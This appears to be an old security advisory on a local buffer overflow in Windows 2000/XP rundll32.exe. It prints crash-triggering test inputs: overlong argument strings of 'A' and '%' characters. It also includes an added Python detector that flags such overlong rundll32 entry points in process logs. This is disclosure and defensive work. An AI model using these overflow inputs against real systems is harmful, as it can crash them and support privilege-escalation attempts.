Microsoft rundll32.exe Local Buffer Overflow Vulnerability
Published: 2003-07-06
Updated: 2003-07-11
Affected systems: Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows XP Professional SP1
Microsoft Windows XP Home SP1
Description:
BUGTRAQ ID: 8114
Microsoft Windows is the Windows operating system developed by Microsoft.
The rundll32.exe shipped with Microsoft Windows does not sufficiently check user-supplied arguments; a local attacker can exploit this to carry out a buffer overflow attack.
When an overlong string is passed as an argument to rundll32.exe, an overflow occurs, which may allow arbitrary instructions to be executed on the system with elevated privileges.
<*Source: Rick Patel (rikul@bellsouth.net)
Link:
http://marc.theaimsgroup.com/?l=bugtraq&m=105770180515783&w=2
*>
Test method:
WARNING
The following program (method) may be offensive in nature and is provided solely for security research and teaching. Users bear the risk themselves!
Rick Patel (rikul@bellsouth.net) provided the following test method:
rundll32.exe advpack32.dll,<'A'x499>
On a system with SP4 applied, the following method also causes an overflow:
C:\WINNT\system32>rundll32.exe
rundll32.exe,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%% <-- crashes 0x00250025...
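As an added defender-side example (not from the advisory or its author): a check over constructed process-creation records, of the kind a Sysmon Event ID 1 or Windows 4688 log carries, that flags rundll32.exe invocations whose DLL,EntryPoint token is overlong or is not a valid export name, which is the shape of argument this advisory describes. The threshold MAX_ENTRY_LEN and the sample records are assumptions.

```python
import re

# Constructed sample process-creation records (not taken from the advisory):
# (image path, full command line). Two mirror the advisory's overlong arguments.
SAMPLE_EVENTS = [
    ("C:\\WINNT\\system32\\rundll32.exe",
     "rundll32.exe shell32.dll,Control_RunDLL desk.cpl"),
    ("C:\\WINNT\\system32\\rundll32.exe",
     "rundll32.exe advpack32.dll," + "A" * 499),
    ("C:\\WINNT\\system32\\rundll32.exe",
     "rundll32.exe rundll32.exe," + "A" * 200 + "%" * 400),
    ("C:\\WINNT\\system32\\notepad.exe",
     "notepad.exe C:\\temp\\" + "B" * 600 + ".txt"),
]

# Assumed ceiling for a legitimate exported entry-point name; tune per environment.
MAX_ENTRY_LEN = 128
# Exported names are C identifiers; rundll32 also accepts an ordinal written "#123".
ENTRY_NAME = re.compile(r"^(#\d+|[A-Za-z_]\w*)$")


def parse_rundll32(cmdline):
    """Return (dll, entry) from 'rundll32.exe DLL,Entry [args]', or None if malformed."""
    tokens = cmdline.split(None, 2)
    if len(tokens) < 2 or "," not in tokens[1]:
        return None
    dll, entry = tokens[1].split(",", 1)
    return dll, entry


def check_event(image, cmdline):
    """Return a reason string if a rundll32.exe call carries an overlong or
    non-identifier entry point, else None. Non-rundll32 images are ignored."""
    if not image.lower().endswith("\\rundll32.exe"):
        return None
    parsed = parse_rundll32(cmdline)
    if parsed is None:
        return None
    dll, entry = parsed
    if len(entry) > MAX_ENTRY_LEN:
        return f"entry point is {len(entry)} chars (> {MAX_ENTRY_LEN}) for {dll}"
    if not ENTRY_NAME.match(entry):
        return f"entry point is not a valid export name for {dll}"
    return None


def scan(events):
    """Return [(command-line prefix, reason)] for every flagged record."""
    flagged = []
    for image, cmdline in events:
        reason = check_event(image, cmdline)
        if reason:
            flagged.append((cmdline[:40], reason))
    return flagged
```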
Recommendations:
Vendor patch:
Microsoft
---------
The vendor has not yet released a patch or upgrade; we recommend that users of this software monitor the vendor's homepage for the latest version:
http://www.microsoft.com/technet/security/
Severity: 20 (user vote)